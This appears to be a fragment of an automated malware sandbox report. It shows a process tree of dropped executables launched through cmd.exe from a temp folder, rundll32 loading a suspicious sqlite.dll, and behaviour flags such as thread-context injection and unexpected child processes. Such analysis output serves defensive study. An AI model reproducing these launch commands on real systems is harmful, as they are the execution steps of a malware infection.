C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe4⤵
- Loads dropped DLL
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exeMon134ab4d3e88a4d3e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo4⤵
- Loads dropped DLL
PID:304 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exeMon13470f9aa951f871.exe /mixtwo5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:752 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exeMon13470f9aa951f871.exe /mixtwo6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 4607⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13be6b39578.exe4⤵
- Loads dropped DLL
PID:912 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exeMon13be6b39578.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe4⤵
- Loads dropped DLL
PID:1244 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exeMon13bb1ac8986b773.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exeC:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe6⤵
- Executes dropped EXE
PID:2168
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exeC:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe6⤵
- Executes dropped EXE
PID:2272
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe4⤵PID:1064
-
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exeMon13248c3d7ea8c81.exe5⤵PID:2836
-
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe"C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe" -u6⤵PID:2884
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2228 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2216
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2344
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:956
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2564
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211119181100.log C:\Windows\Logs\CBS\CbsPersist_20211119181100.cab1⤵PID:2884